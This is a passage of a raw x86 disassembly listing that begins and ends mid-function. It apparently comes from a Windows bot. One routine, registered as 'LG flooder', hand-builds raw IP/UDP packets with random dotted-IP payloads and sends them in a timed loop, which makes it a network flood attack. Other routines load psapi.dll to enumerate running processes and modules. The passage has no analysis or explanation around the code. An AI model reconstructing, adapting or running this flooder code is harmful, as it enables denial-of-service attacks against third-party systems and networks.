mov eax, [ebp+var_133C]
mov al, [eax]
and al, 0F0h
or al, 5
mov ecx, [ebp+var_133C]
mov [ecx], al
mov eax, [ebp+var_133C]
mov al, [eax]
and al, 0Fh
or al, 40h
mov ecx, [ebp+var_133C]
mov [ecx], al
mov eax, [ebp+var_133C]
mov byte ptr [eax+9], 11h
mov eax, [ebp+var_133C]
mov ecx, [ebp+var_C]
mov [eax+10h], ecx
mov eax, [ebp+var_133C]
mov cx, [ebp+var_E]
mov [eax+16h], cx
and [ebp+var_1338], 0
jmp short loc_4057B6
; ---------------------------------------------------------------------------
loc_4057A9: ; CODE XREF: sub_4055E5:loc_405E22�j
mov eax, [ebp+var_1338]
inc eax
mov [ebp+var_1338], eax
loc_4057B6: ; CODE XREF: sub_4055E5+1C2�j
mov eax, [ebp+var_1338]
cmp eax, [ebp+var_1087]
jge loc_405E27
mov eax, [ebp+var_107F]
mov [ebp+var_1358], eax
cmp [ebp+var_1358], 1
jz short loc_4057FC
cmp [ebp+var_1358], 2
jz loc_405924
cmp [ebp+var_1358], 3
jz loc_405A11
jmp loc_405C71
; ---------------------------------------------------------------------------
loc_4057FC: ; CODE XREF: sub_4055E5+1F6�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_40581E: ; CODE XREF: sub_4055E5+2BF�j
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_4058A9
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_40581E
; ---------------------------------------------------------------------------
loc_4058A9: ; CODE XREF: sub_4055E5+247�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset dword_418A64
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405C93
; ---------------------------------------------------------------------------
loc_405924: ; CODE XREF: sub_4055E5+1FF�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405946: ; CODE XREF: sub_4055E5+3CB�j
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_4059B2
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp short loc_405946
; ---------------------------------------------------------------------------
loc_4059B2: ; CODE XREF: sub_4055E5+36F�j
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset dword_418A64
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405C93
; ---------------------------------------------------------------------------
loc_405A11: ; CODE XREF: sub_4055E5+20C�j
push 2
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_134C], eax
cmp [ebp+var_134C], 0
jnz short loc_405A52
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset dword_418A60
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
jmp loc_405C6F
; ---------------------------------------------------------------------------
loc_405A52: ; CODE XREF: sub_4055E5+444�j
cmp [ebp+var_134C], 1
jnz loc_405B87
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405A81: ; CODE XREF: sub_4055E5+522�j
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_405B0C
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405A81
; ---------------------------------------------------------------------------
loc_405B0C: ; CODE XREF: sub_4055E5+4AA�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset dword_418A64
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405C6F
; ---------------------------------------------------------------------------
loc_405B87: ; CODE XREF: sub_4055E5+474�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405BA9: ; CODE XREF: sub_4055E5+62E�j
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_405C15
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp short loc_405BA9
; ---------------------------------------------------------------------------
loc_405C15: ; CODE XREF: sub_4055E5+5D2�j
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset dword_418A64
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
loc_405C6F: ; CODE XREF: sub_4055E5+468�j
; sub_4055E5+59D�j
jmp short loc_405C93
; ---------------------------------------------------------------------------
loc_405C71: ; CODE XREF: sub_4055E5+212�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset dword_418A60
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405C93: ; CODE XREF: sub_4055E5+33A�j
; sub_4055E5+427�j ...
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_1354], eax
and [ebp+var_1350], 0
jmp short loc_405CB8
; ---------------------------------------------------------------------------
loc_405CAB: ; CODE XREF: sub_4055E5+6F9�j
mov eax, [ebp+var_1350]
inc eax
mov [ebp+var_1350], eax
loc_405CB8: ; CODE XREF: sub_4055E5+6C4�j
mov eax, [ebp+var_1350]
cmp eax, [ebp+var_1354]
jnb short loc_405CE0
mov eax, [ebp+var_14]
add eax, [ebp+var_1350]
mov al, [eax]
shl al, 1
mov ecx, [ebp+var_14]
add ecx, [ebp+var_1350]
mov [ecx], al
jmp short loc_405CAB
; ---------------------------------------------------------------------------
loc_405CE0: ; CODE XREF: sub_4055E5+6DF�j
mov eax, [ebp+var_1354]
add eax, 1Ch
push eax
call dword_417238 ; htons
mov ecx, [ebp+var_133C]
mov [ecx+2], ax
call sub_41043F
push eax
call dword_417238 ; htons
mov ecx, [ebp+var_133C]
mov [ecx+4], ax
call sub_410483
neg eax
sbb eax, eax
and al, 0C0h
add eax, 80h
mov ecx, [ebp+var_133C]
mov [ecx+8], al
push 2
push offset dword_41EF18
call dword_417244 ; inet_addr
push eax
call sub_4040E8
pop ecx
pop ecx
mov ecx, [ebp+var_133C]
mov [ecx+0Ch], eax
mov eax, [ebp+var_1354]
add eax, 14h
push eax
push [ebp+var_133C]
call sub_40407D
pop ecx
pop ecx
mov ecx, [ebp+var_133C]
mov [ecx+0Ah], ax
movzx eax, [ebp+var_E]
test eax, eax
jnz short loc_405D7F
call sub_41043F
mov ecx, [ebp+var_133C]
mov [ecx+16h], ax
loc_405D7F: ; CODE XREF: sub_4055E5+789�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
push eax
call dword_417238 ; htons
mov ecx, [ebp+var_133C]
mov [ecx+14h], ax
mov eax, [ebp+var_1354]
add eax, 8
push eax
call dword_417238 ; htons
mov ecx, [ebp+var_133C]
mov [ecx+18h], ax
push 10h
lea eax, [ebp+var_10]
push eax
push 0
mov eax, [ebp+var_1354]
add eax, 1Ch
push eax
lea eax, [ebp+var_1074]
push eax
push [ebp+var_1078]
call dword_417250 ; sendto
mov [ebp+var_1348], eax
cmp [ebp+var_1348], 0FFFFFFFFh
jnz short loc_405E08
push [ebp+var_1334]
call sub_409763
pop ecx
push [ebp+var_1078]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_405E41
; ---------------------------------------------------------------------------
loc_405E08: ; CODE XREF: sub_4055E5+805�j
push [ebp+var_1083]
call dword_41709C ; Sleep
mov eax, [ebp+var_1334]
cmp dword ptr [eax+4], 0
jz short loc_405E22
jmp short loc_405E27
; ---------------------------------------------------------------------------
loc_405E22: ; CODE XREF: sub_4055E5+839�j
jmp loc_4057A9
; ---------------------------------------------------------------------------
loc_405E27: ; CODE XREF: sub_4055E5+1DD�j
; sub_4055E5+83B�j
push [ebp+var_1078]
call sub_4053B1
pop ecx
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
locret_405E41: ; CODE XREF: sub_4055E5+59�j
; sub_4055E5+94�j ...
leave
retn 4
sub_4055E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405E45 proc near ; CODE XREF: sub_40A9CF+8B2�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_4], 0
jz short loc_405E5D
cmp [ebp+arg_8], 0
jz short loc_405E5D
cmp [ebp+arg_14], 0
jnz short loc_405E62
loc_405E5D: ; CODE XREF: sub_405E45+A�j
; sub_405E45+10�j
jmp locret_405F65
; ---------------------------------------------------------------------------
loc_405E62: ; CODE XREF: sub_405E45+16�j
push 2B9h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_405E7B
jmp locret_405F65
; ---------------------------------------------------------------------------
loc_405E7B: ; CODE XREF: sub_405E45+2F�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 1A7h
push eax
call sub_407A56
add esp, 0Ch
push 6
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 2A7h
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+2ADh], eax
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+2B1h], eax
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+2B5h], eax
mov eax, [ebp+var_4]
cmp dword ptr [eax+2B1h], 0EA60h
jge short loc_405F0E
mov eax, [ebp+var_4]
mov eax, [eax+2B1h]
mov [ebp+var_8], eax
jmp short loc_405F15
; ---------------------------------------------------------------------------
loc_405F0E: ; CODE XREF: sub_405E45+B9�j
mov [ebp+var_8], 0EA60h
loc_405F15: ; CODE XREF: sub_405E45+C7�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov [eax+2B1h], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax+2B1h], 64h
jle short loc_405F3B
mov eax, [ebp+var_4]
mov eax, [eax+2B1h]
mov [ebp+var_C], eax
jmp short loc_405F42
; ---------------------------------------------------------------------------
loc_405F3B: ; CODE XREF: sub_405E45+E6�j
mov [ebp+var_C], 64h
loc_405F42: ; CODE XREF: sub_405E45+F4�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_C]
mov [eax+2B1h], ecx
push offset aLgFlooder ; "LG flooder"
push 0
push [ebp+var_4]
push offset sub_4055E5
call sub_4095A4
add esp, 10h
locret_405F65: ; CODE XREF: sub_405E45:loc_405E5D�j
; sub_405E45+31�j
leave
retn
sub_405E45 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405F67 proc near ; CODE XREF: sub_4017AA+6E�p
; sub_401D6E+77�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
jnz short loc_405F8E
push 1A3h
push 0
push [ebp+arg_0]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_0]
mov byte ptr [eax+198h], 1
jmp short loc_405FA1
; ---------------------------------------------------------------------------
loc_405F8E: ; CODE XREF: sub_405F67+7�j
push 1A3h
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
loc_405FA1: ; CODE XREF: sub_405F67+25�j
pop ebp
retn
sub_405F67 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405FA3 proc near ; CODE XREF: sub_4167F1+D0�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push offset dword_41E280
call sub_409C36
pop ecx
push offset aPsapi_dll ; "psapi.dll"
call dword_417054 ; LoadLibraryA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_405FC8
jmp short locret_40603F
; ---------------------------------------------------------------------------
loc_405FC8: ; CODE XREF: sub_405FA3+21�j
push offset aEnumprocesses ; "EnumProcesses"
push [ebp+var_4]
call dword_417058 ; GetProcAddress
mov dword_41E27C, eax
push offset aEnumprocessmod ; "EnumProcessModules"
push [ebp+var_4]
call dword_417058 ; GetProcAddress
mov dword_41E270, eax
push offset aGetmodulefilen ; "GetModuleFileNameExA"
push [ebp+var_4]
call dword_417058 ; GetProcAddress
mov dword_41E274, eax
push offset aGetmoduleinfor ; "GetModuleInformation"
push [ebp+var_4]
call dword_417058 ; GetProcAddress
mov dword_41E278, eax
cmp dword_41E27C, 0
jz short locret_40603F
cmp dword_41E270, 0
jz short locret_40603F
cmp dword_41E274, 0
jz short locret_40603F
cmp dword_41E278, 0
jz short locret_40603F
mov byte_41E29C, 1
locret_40603F: ; CODE XREF: sub_405FA3+23�j
; sub_405FA3+78�j ...
leave
retn
sub_405FA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406041 proc near ; CODE XREF: sub_401244:loc_40129D�p
; sub_40637C+29�p
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
var_12B = byte ptr -12Bh
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 13Ch
push esi
push edi
push offset dword_41E280
call sub_409C6C
pop ecx
movzx eax, byte_41E29C
test eax, eax
jnz short loc_406074
push offset dword_41E280
call sub_409C7A
pop ecx
xor eax, eax
jmp loc_40636A
; ---------------------------------------------------------------------------
loc_406074: ; CODE XREF: sub_406041+1F�j
and [ebp+var_C], 0
and [ebp+var_4], 0
and [ebp+var_1C], 0
push [ebp+var_1C]
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_406097
jmp loc_406368
; ---------------------------------------------------------------------------
loc_406097: ; CODE XREF: sub_406041+4F�j
; sub_406041:loc_4060E9�j
mov eax, [ebp+var_1C]
add eax, 80h
mov [ebp+var_1C], eax
push [ebp+var_1C]
push [ebp+var_14]
call sub_416BF6 ; realloc
pop ecx
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4060BD
jmp loc_406366
; ---------------------------------------------------------------------------
loc_4060BD: ; CODE XREF: sub_406041+75�j
lea eax, [ebp+var_4]
push eax
push [ebp+var_1C]
push [ebp+var_14]
call dword_41E27C
test eax, eax
jnz short loc_4060DF
push [ebp+var_14]
call sub_416B4C ; free
pop ecx
jmp loc_406364
; ---------------------------------------------------------------------------
loc_4060DF: ; CODE XREF: sub_406041+8E�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_1C]
jnb short loc_4060E9
jmp short loc_4060EB
; ---------------------------------------------------------------------------
loc_4060E9: ; CODE XREF: sub_406041+A4�j
jmp short loc_406097
; ---------------------------------------------------------------------------
loc_4060EB: ; CODE XREF: sub_406041+A6�j
mov eax, [ebp+var_4]
shr eax, 2
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
imul eax, 114h
add eax, 8
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_40611E
push [ebp+var_14]
call sub_416B4C ; free
pop ecx
jmp loc_406362
; ---------------------------------------------------------------------------
loc_40611E: ; CODE XREF: sub_406041+CD�j
mov eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [eax], ecx
mov eax, [ebp+var_C]
add eax, 8
mov ecx, [ebp+var_C]
mov [ecx+4], eax
and [ebp+var_10], 0
jmp short loc_40613F
; ---------------------------------------------------------------------------
loc_406138: ; CODE XREF: sub_406041+156�j
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_40613F: ; CODE XREF: sub_406041+F5�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_8]
jnb short loc_406199
push 114h
push 0
mov eax, [ebp+var_C]
push dword ptr [eax+4]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_10]
mov esi, [ebp+var_14]
mov edx, [esi+edx*4]
mov [ecx+eax], edx
push offset aSystem ; "system"
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_406138
; ---------------------------------------------------------------------------
loc_406199: ; CODE XREF: sub_406041+104�j
push [ebp+var_14]
call sub_416B4C ; free
pop ecx
and [ebp+var_10], 0
jmp short loc_4061AF
; ---------------------------------------------------------------------------
loc_4061A8: ; CODE XREF: sub_406041+1A8�j
; sub_406041+1D8�j ...
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_4061AF: ; CODE XREF: sub_406041+165�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_8]
jnb loc_406343
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
push 0
push 410h
call dword_417094 ; OpenProcess
mov [ebp+var_130], eax
cmp [ebp+var_130], 0
jnz short loc_4061EB
jmp short loc_4061A8
; ---------------------------------------------------------------------------
loc_4061EB: ; CODE XREF: sub_406041+1A6�j
and [ebp+var_20], 0
and [ebp+var_28], 0
lea eax, [ebp+var_20]
push eax
push 4
lea eax, [ebp+var_28]
push eax
push [ebp+var_130]
call dword_41E270
test eax, eax
jnz short loc_40621B
push [ebp+var_130]
call dword_4170A4 ; CloseHandle
jmp short loc_4061A8
; ---------------------------------------------------------------------------
loc_40621B: ; CODE XREF: sub_406041+1CA�j
push 0Ch
lea eax, [ebp+var_13C]
push eax
push [ebp+var_28]
push [ebp+var_130]
call dword_41E278
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_13C]
mov [ecx+eax+4], edx
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_138]
mov [ecx+eax+8], edx
mov al, byte_41DE00
mov [ebp+var_12C], al
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_12B]
rep stosd
stosw
stosb
push 104h
lea eax, [ebp+var_12C]
push eax
push [ebp+var_13C]
push [ebp+var_130]
call dword_41E274
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz loc_406332
movsx eax, [ebp+var_12C]
test eax, eax
jz short loc_406332
push 104h
lea eax, [ebp+var_12C]
push eax
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
lea eax, [ebp+var_12C]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_18], eax
jmp short loc_4062F7
; ---------------------------------------------------------------------------
loc_4062F0: ; CODE XREF: sub_406041:loc_406330�j
mov eax, [ebp+var_18]
dec eax
mov [ebp+var_18], eax
loc_4062F7: ; CODE XREF: sub_406041+2AD�j
cmp [ebp+var_18], 0
jz short loc_406332
cmp [ebp+var_18], 1
ja short loc_406305
jmp short loc_406332
; ---------------------------------------------------------------------------
loc_406305: ; CODE XREF: sub_406041+2C0�j
mov eax, [ebp+var_18]
movsx eax, byte ptr [ebp+eax+var_130+3]
cmp eax, 5Ch
jnz short loc_406330
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_18]
mov [ecx+eax+110h], edx
jmp short loc_406332
; ---------------------------------------------------------------------------
loc_406330: ; CODE XREF: sub_406041+2D2�j
jmp short loc_4062F0
; ---------------------------------------------------------------------------
loc_406332: ; CODE XREF: sub_406041+264�j
; sub_406041+273�j ...
push [ebp+var_130]
call dword_4170A4 ; CloseHandle
jmp loc_4061A8
; ---------------------------------------------------------------------------
loc_406343: ; CODE XREF: sub_406041+174�j
push offset dword_41E280
call sub_409C7A
pop ecx
mov eax, [ebp+var_C]
jmp short loc_40636A
; ---------------------------------------------------------------------------
loc_406353: ; CODE XREF: sub_406041:loc_406362�j
; sub_406041:loc_406364�j ...
push offset dword_41E280
call sub_409C7A
pop ecx
xor eax, eax
jmp short loc_40636A
; ---------------------------------------------------------------------------
loc_406362: ; CODE XREF: sub_406041+D8�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_406364: ; CODE XREF: sub_406041+99�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_406366: ; CODE XREF: sub_406041+77�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_406368: ; CODE XREF: sub_406041+51�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_40636A: ; CODE XREF: sub_406041+2E�j
; sub_406041+310�j ...
pop edi
pop esi
leave
retn
sub_406041 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40636E proc near ; CODE XREF: sub_401244+4D2�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
pop ebp
retn
sub_40636E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40637C proc near ; DATA XREF: sub_4064BF+3B�o
var_1B0 = dword ptr -1B0h
var_1AC = dword ptr -1ACh
var_1A8 = dword ptr -1A8h
var_1A4 = byte ptr -1A4h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B0h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_1A8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
call sub_406041
mov [ebp+var_1AC], eax
cmp [ebp+var_1AC], 0
jz loc_4064AD
mov eax, [ebp+var_1AC]
push dword ptr [eax]
mov eax, [ebp+var_1A8]
push dword ptr [eax]
push offset dword_418B1C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
and [ebp+var_1B0], 0
jmp short loc_4063F7
; ---------------------------------------------------------------------------
loc_4063EA: ; CODE XREF: sub_40637C:loc_40649C�j
mov eax, [ebp+var_1B0]
inc eax
mov [ebp+var_1B0], eax
loc_4063F7: ; CODE XREF: sub_40637C+6C�j
mov eax, [ebp+var_1AC]
mov ecx, [ebp+var_1B0]
cmp ecx, [eax]
jge loc_4064A1
push 3E8h
call dword_41709C ; Sleep
mov eax, [ebp+var_1B0]
imul eax, 114h
mov ecx, [ebp+var_1AC]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
mov eax, [ebp+var_1B0]
imul eax, 114h
mov ecx, [ebp+var_1AC]
mov ecx, [ecx+4]
push dword ptr [ecx+eax+8]
mov eax, [ebp+var_1B0]
imul eax, 114h
mov ecx, [ebp+var_1AC]
mov ecx, [ecx+4]
push dword ptr [ecx+eax+4]
mov eax, [ebp+var_1B0]
imul eax, 114h
mov ecx, [ebp+var_1AC]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
push offset dword_418B04
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 18h
mov eax, [ebp+var_1A8]
cmp dword ptr [eax+4], 0
jz short loc_40649C
jmp short loc_4064A1
; ---------------------------------------------------------------------------
loc_40649C: ; CODE XREF: sub_40637C+11C�j
jmp loc_4063EA
; ---------------------------------------------------------------------------
loc_4064A1: ; CODE XREF: sub_40637C+89�j
; sub_40637C+11E�j
push [ebp+var_1AC]
call sub_416B4C ; free
pop ecx
loc_4064AD: ; CODE XREF: sub_40637C+3B�j
push [ebp+var_1A8]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_40637C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4064BF proc near ; CODE XREF: sub_40A9CF+3FF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4064D9
jmp short locret_406507
; ---------------------------------------------------------------------------
loc_4064D9: ; CODE XREF: sub_4064BF+16�j
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push offset dword_418B44
push 0
push [ebp+var_4]
push offset sub_40637C
call sub_4095A4
add esp, 10h
locret_406507: ; CODE XREF: sub_4064BF+18�j
leave
retn
sub_4064BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406509 proc near ; CODE XREF: sub_40A9CF+9C9�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
